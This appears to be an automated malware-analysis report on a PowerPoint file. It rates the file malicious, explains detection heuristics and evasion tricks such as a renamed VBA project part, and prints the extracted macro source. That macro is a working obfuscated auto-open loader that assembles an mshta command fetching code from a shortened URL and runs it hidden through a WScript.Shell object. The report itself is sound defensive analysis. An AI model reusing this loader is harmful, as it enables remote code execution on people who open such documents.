MALICIOUS
280
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The OOXML document contains an obfuscated VBA macro within an auto_open subroutine. This macro constructs a URL by concatenating strings and then uses GetObject to execute it, likely downloading and running a second-stage payload. The obfuscation and use of CreateObject/GetObject for execution are indicative of malicious intent.
Heuristics 7
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present (project part renamed away from vbaProject.bin: ppt/vbAA.b)
-
Obfuscated auto-exec VBA loader critical OLE_VBA_OBFUSCATED_AUTOEXEC_LOADERAuto-exec VBA reconstructs strings with a heavy custom decoder (numeric char-array, repeated hex-string decode, or junk-token Replace removal) and feeds them to a COM-instantiation or execution sink. This obfuscated-loader shape keeps CreateObject/Shell/URL indicators out of the macro source.
-
VBA project part renamed to evade filename detection high OOXML_VBA_PROJECT_RENAMEDThe VBA project is bound through the OOXML relationship/content type but its part is not named vbaProject.bin. Legitimate Office producers always emit vbaProject.bin; renaming it hides the macros from path-only scanners (observed in the SVCReady loader).
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
GetObject call high OLE_VBA_GETOBJGetObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1708 bytes |
SHA-256: 35533007f82e2d0e34c9456bd2a376f195defe5a20db8355fe1fbca5d466fdeb |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Sub auto_open()
Dim obj As New Class3
obj.initiate
End Sub
Attribute VB_Name = "Class1"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function Exec()
Set Exec = GetObject(StrReverse("8BFA88B42489-24A8-B834-A07D-5DD42C27:wen"))
End Function
Attribute VB_Name = "Class2"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function GetName(list2 As Object)
Set list2 = CreateObject("System.Collections.ArrayList")
Dim Lola As String
list2.Add "m"
list2.Add "sht"
list2.Add "a http://"
list2.Add "bit.ly/asdasdqwreresdasd"
Lola = Join(list2.ToArray, "")
GetName = StrReverse(StrReverse(Lola))
End Function
Attribute VB_Name = "Class3"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Public Function initiate()
Dim SsMon As New Class1
Dim obj3 As New Class2
Dim newobj As Object
obj3.GetName newobj
SS = newobj(0) + newobj(1) + newobj(2) + newobj(3)
SsMon.Exec.Run SS, 0
End Function
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: ppt/vbAA.b | 28160 bytes |
SHA-256: 28ce9caa19cb88ecbc4be90b599ca7a5c90990438be05ba6f662d1307354a392 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.